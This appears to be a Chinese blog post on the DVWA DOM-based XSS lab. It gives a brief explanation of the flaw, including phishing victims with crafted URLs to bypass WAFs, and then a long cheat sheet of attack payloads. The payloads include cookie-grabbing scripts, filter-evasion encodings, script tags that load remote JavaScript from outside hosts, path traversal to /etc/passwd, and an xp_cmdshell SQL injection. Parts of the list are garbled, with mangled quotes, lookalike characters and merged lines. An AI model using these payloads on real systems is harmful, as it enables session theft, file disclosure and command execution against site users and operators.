• PHP代码审计DVWA[XSS (DOM)]


    在这里插入图片描述

    XSS (DOM

    靶场搭建可用蓝易云服务器

    😘😘😘😘😘😘点击查看详情

    DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。

    客户端JavaScript可以访问浏览器的DOM文本对象模型是利用的前提,当确认客户端代码中有DOM型XSS漏洞时,并且能诱使(钓鱼)一名用户访问自己构造的URL,就说明可以在受害者的客户端注入恶意脚本。利用步骤和反射型很类似,但是唯一的区别就是,构造的URL参数不用发送到服务器端,可以达到绕过WAF、躲避服务端的检测效果。

    XSS攻击代码

    1'"()&%
     
    
     
    
     
    '><script>alert(document.cookie)</script>
     
    ='>
     
    
     
    %3Cscript%3Ealert('XSS')%3C/script%3E
     
    
     
    XSS')">
     
    %0a%0a.jsp
     
    %22%3cscript%3ealert(%22xss%22)%3c/script%3e
     
    %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
     
    %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
     
    %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
     
    %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
     
    %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
     
    
     
    
     
    a.jsp/
     
    a?
     
    ">
     
    ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
     
    %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
    %3Cscript%3Ealert(document. domain);%3C/script%3E&
     
    %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
     
    <IMG src="javascript:alert('XSS');">
     
    <IMG src=javascript:alert('XSS')>
     
    <IMG src=JaVaScRiPt:alert('XSS')>
     
    <IMG src=JaVaScRiPt:alert("XSS")>
     
    <IMG src=javascript:alert('XSS')>
     
    <IMG src=javascript:alert('XSS')>
     
    <IMG src=javascript:alert('XSS')>
     
    <IMG src="jav ascript:alert('XSS');">
     
    <IMG src="jav ascript:alert('XSS');">
     
    <IMG src="jav ascript:alert('XSS');">
     
    "";' > out
     
    XSS');">
     
    
     
    XSS')">
     
    XSS')>
     
    XSS')">
     
    XSS')">
     
    XSS');">
     
    
    XSS
    ')}"> XSS');"> XSS');"> XSS')> XSS')">
    XSS'))">
    ://www.how-to-hack.org/exploit.html');"> <DIV STYLE="width: expression(alert('XSS'));"> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE='xss:expre\ssion(alert("XSS"))'> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <BASE href="javascript:alert('XSS');//"> getURL("javascript:alert('XSS')") a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d); <XML src="javascript:alert('XSS');"> "> <" <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT> <IMG src="javascript:alert('XSS')" <!--#exec cmd="/bin/echo ''"--> ://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT> <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT> <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT> <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT> <SCRIPT>document.write(");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT> <A href=http://www.gohttp://www.google.com/ogle.com/>link <IMG SRC=javascript:alert(XSS)> <IMG SRC=# οnmοuseοver=”alert(‘xxs’)”> <IMG SRC=/ onerror=alert(String.fromCharCode(88,83,83))></img> <img src=x onerror=&#0000106avascript:alert('XSS')″> <IMG SRC=&#106;avascript:alert( &#39;XSS')> <IMG SRC=&#x6Aavascript:alert('XSS')> <IMG SRC=”jav ascript:alert(XSS);> <IMG SRC=”jav&#x0A;ascript:alert(‘XSS’);”> <IMG SRC=&#14; javascript:alert(‘XSS’);”> <<SCRIPT>alert(XSS);//< <IMG SRC=”javascript:alert(XSS)</script><script>alert(XSS);</script> <INPUT TYPE=IMAGESRC=”javascript:alert(XSS);> <BODY BACKGROUND=”javascript:alert(XSS)> <svg/onload=alert('XSS')> <IMG SRC=’vbscript:msgbox(XSS)> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <XSS STYLE="behavior: url(xss.htc);"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="width: expression(alert('XSS'));"> <SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT> <script>alert(/xss/)</script> <svg onload=alert(document.domain)> <img src=document.domain onerror=alert(document.domain)> <M onmouseover=alert(document.domain)>M <marquee onscroll=alert(document.domain)> <a href=javascript:alert(document.domain)>M</a> <body onload=alert(document.domain)> <details open ontoggle=alert(document.domain)> <embed src=javascript:alert(document.domain)> <script>alert(1)</script> <sCrIpT>alert(1)</sCrIpT> <ScRiPt>alert(1)</ScRiPt> <sCrIpT>alert(1)</ScRiPt> <ScRiPt>alert(1)</sCrIpT> <img src=1 onerror=alert(1)> <iMg src=1 oNeRrOr=alert(1)> <ImG src=1 OnErRoR=alert(1)> <img src=1 onerror="alert("M")"> <marquee onscroll=alert(1)> <mArQuEe OnScRoLl=alert(1)> <MaRqUeE oNsCrOlL=alert(1)> <a href=javascript:/0/,alert(%22M%22)>M</a> <a href=javascript:/00/,alert(%22M%22)>M</a> <a href=javascript:/000/,alert(%22M%22)>M</a> <a href=javascript:/M/,alert(%22M%22)>M</a> <base href=javascript:/M/><a href=,alert(1)>M</a> <base href=javascript:/M/><iframe src=,alert(1)></iframe> </textarea><script>var a=1//@ sourceMappingURL=//xss.site ">.gif
    -image:url(javascript:alert(/xss/))">